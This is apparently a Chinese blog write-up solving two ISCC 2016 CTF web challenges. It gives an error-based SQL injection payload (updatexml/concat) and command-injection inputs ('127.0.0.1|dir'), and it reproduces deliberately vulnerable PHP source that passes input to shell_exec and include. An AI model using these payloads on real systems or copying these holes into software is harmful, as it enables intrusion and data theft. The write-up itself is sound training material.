【CTF web】ISCC 2016 web 2题记录

偶然看到的比赛,我等渣渣跟风做两题,剩下的题目工作太忙没有时间继续做。

第1题 sql注入:

题目知识

   考察sql注入知识,题目地址:http://101.200.145.44/web1//index.php

做题过程

第一步:注入Playload

    user=flag&pass=‘ or updatexml(1,concat(0x7e,(select pw from user limit 1,1 )),0)# ‘

第二步:注入效果

    Masel‘s secure site 重置数据库 Error: XPATH syntax error: ‘~*75DBBA7B5806E761411‘

第三步:获取源码,得知用户名为flag,使用注入出的密码登录可得到flag

    用户名为flag 密码为:*75DBBA7B5806E761411
    Loggedin!Flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b

相关源码 

http://101.200.145.44/web1//index.php.txt

<html>
<head>
Masel‘s secure site
</head>
<body>

<a href="setup-db.php">重置数据库</a>

<?php
include("auth.php");
$servername = $host;
$username = $dbuser;
$password = $dbpass;
$database = $dbname;

error_reporting(0);
if($_POST["user"] && $_POST["pass"]) {
	$conn = mysqli_connect($servername, $username, $password, $database);
	if ($conn->connect_error) {
		die("Connection failed: " . mysqli_error($conn));
}
$user = $_POST["user"];
$pass = $_POST["pass"];

$sql = "select user from user where pw=‘$pass‘";
//echo $sql;
$query = mysqli_query($conn,$sql);
if (!$query) {
	printf("Error: %s\n", mysqli_error($conn));
	exit();
}
$row = mysqli_fetch_array($query);
//echo $row["pw"];
if ($row[user]){
	if ($row[user] == "flag" && $user=="flag") {
		echo "<p>Logged in! Flag: ****************** </p>";
	}
	else{
		echo "<p>Password is right, but it‘s not for the flag </p>";
	}
}
else {
    echo("<p>Wrong password!</p>");
  }
}

?>

<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.php.txt">Source</a>
</html>

key

  1. Loggedin!Flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b

第2题:

题目知识

   考察命令执行的绕过,题目地址:http://101.200.145.44/web2//index.php

做题过程

第一步:得到文件名

    127.0.0.1|dir
    或
    127.0.0.1&&dir

执行结果
1C9976C230DA289C1C359CD2A7C02D48  index.php  index.php.txt

第二步:再次得到文件名

    127.0.0.1|dir 1C9976C230DA289C1C359CD2A7C02D48

执行结果
flag.php

第三步:直接访问

  1. 连接URL地址直接访问
  2. http://101.200.145.44/web2/1C9976C230DA289C1C359CD2A7C02D48/flag.php

相关源码

<?php
header("Content-type: text/html; charset=utf-8");
?>
<html>
<head>
<title></title>
</head>
<body>
<div align="center">
	<h1 al>我刚做了一个ping命令的小工具,快试一下吧!</h1>

	<div >
		<p>请输入目标IP</p>
		<form name="ping" action="index.php" method="post">
			<input type="text" name="ip" size="30">
			<input type="submit" value="submit" name="submit">
		</form>
	</div>
<div>
</body>
</html>
<?php
if( isset( $_POST[ ‘submit‘ ] ) ) {

	$target = $_REQUEST[ ‘ip‘ ];
	if(preg_match(‘/dir|cd|^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/‘,$target))
	{
		// Determine OS and execute the ping command.
		if (stristr(php_uname(‘s‘), ‘Windows NT‘)) { 

			$cmd = shell_exec( ‘ping  ‘ . $target );
			echo ‘<pre>‘.iconv(‘GB2312‘, ‘UTF-8‘,$cmd).‘</pre>‘;

		} else
		{
			$cmd = shell_exec( ‘ping  -c 3 ‘ . $target );
			echo ‘<pre>‘.iconv(‘GB2312‘, ‘UTF-8‘,$cmd).‘</pre>‘;
		}
	}
	else
		echo "输入格式不正确!";
}
if( isset($_GET[‘file‘]))
{
	include($_GET[‘file‘]);
}
?>

key

  1. flag{0d143dcd-5b29-4f4f-9b16-73665aeb45a8}
时间: 2024-10-24 21:59:51

【CTF web】ISCC 2016 web 2题记录的相关文章

刷题记录:[0CTF 2016]piapiapia(欠)

目录 刷题记录:[0CTF 2016]piapiapia 刷题记录:[0CTF 2016]piapiapia 今天可能要欠着了 原文地址:https://www.cnblogs.com/20175211lyz/p/11444134.html

[原题复现]-HITCON 2016 WEB《babytrick》[反序列化]

前言 不想复现的可以访问榆林学院信息安全协会CTF训练平台找到此题直接练手 HITCON 2016 WEB -babytrick(复现) 原题 index.php 1 <?php 2 3 include "config.php"; 4 5 class HITCON{ 6 private $method; 7 private $args; 8 private $conn; 9 10 public function __construct($method, $args) { 11 $

Web前端错题模糊题记录

title: Web前端错题模糊题记录 toc: true date: 2018-09-20 10:04:36 categories: Web tags: HTML CSS JavaScript HTML 元素的alt和title有什么异同? alt和title同时设置的时候,alt作为图片的替代文字出现,title是图片的解释文字. 关于html5标签? <audio> 标签定义声音,比如音乐或其他音频流. <canvas> 标签定义图形,比如图表和其他图像.<canvas

ISCC 2017 Web writeup

ISCC 2017 Web writeupWeb签到题WelcomeToMySQL自相矛盾我们一起来日站I have a jpg,i upload a txt.where is your flagSimple sqli ISCC 2017 Web writeup Web签到题 这种签到题不能往难了想,首先理所当然的这样传参 hiddenflag=f1ag&flag=f1ag 这回显不一样了,试了很多方法,最后就是再加一个参数FLAG=f1ag,然后就成了,完全没有逻辑... WelcomeToM

WEB应用打成jar包全记录

内容属原创,转载请注明出处 题外 由于项目的需求—不管是怎么产生的这个需求—总之,需要支持把一个web应用打成jar包供其他应用使用,这就有了下面的过程. 这个过程里用到了Spring和SpringMVC(用到的版本是3.1.4,后面略过此描述)的若干东东,如果不用这玩意的,请飘过. 要做些什么? 需要打包的这个Web应用包含下面这些内容: 静态资源,含 js.css.image 页面文件:jsp Jsp标签,含 tld文件和若干java代码 基于SpringMVC的其他若干Control和Se

Dynamics CRM 2015/2016 Web API:基于视图的数据查询

Dynamics CRM 2016 Web API支持基于视图来查询数据,博主初看到该Feature,着实让我眼前一亮,这个功能太给力了,完全颠覆了之前复杂繁琐的取数方式了,现在的视图真正到了定义一次,处处复用的地步了!使用方法也很简单,只需要加个参数并指定需要调用的View ID就好了.接下来我给大家演示3个比较常用的场景:调用公共视图,调用私有视图,调用SubGrid视图. 公共视图 什么是公共视图?就是大家都有权限访问的视图,比如客户实体上的我的可用客户视图,我们一般在UI上面这么调用它们

刷题记录:[De1CTF 2019]Giftbox &amp;&amp; Comment

目录 刷题记录:[De1CTF 2019]Giftbox && Comment 一.知识点 1.sql注入 && totp 2.RCE 3.源码泄露 4.敏感文件读取 刷题记录:[De1CTF 2019]Giftbox && Comment 题目复现链接:https://buuoj.cn/challenges 参考链接:De1CTF Web WriteUp BUUCTF平台 web writeup 第三弹 一.知识点 1.sql注入 && t

刷题记录:[强网杯 2019]Upload

目录 刷题记录:[强网杯 2019]Upload 一.知识点 1.源码泄露 2.php反序列化 刷题记录:[强网杯 2019]Upload 题目复现链接:https://buuoj.cn/challenges 参考链接:2019 第三届强网杯 Web 部分 WriteUp + 复现环境 一.知识点 1.源码泄露 www.tar.gz 2.php反序列化 看起来文件很大,但是用phpstorm打开的话会发现默认打开的文件里有两个断点,其实是给的hint,指出了反序列化利用的地方.之后常规的反序列化

刷题记录:[RCTF 2019]Nextphp

目录 刷题记录:[RCTF 2019]Nextphp 知识点 preload/FFI同时使用导致绕过disable_function/open_basedir php_exec 刷题记录:[RCTF 2019]Nextphp 题目复现链接:https://buuoj.cn/challenges 参考链接:RCTF 2019 Web Writeup 知识点 preload/FFI同时使用导致绕过disable_function/open_basedir 看文档https://wiki.php.ne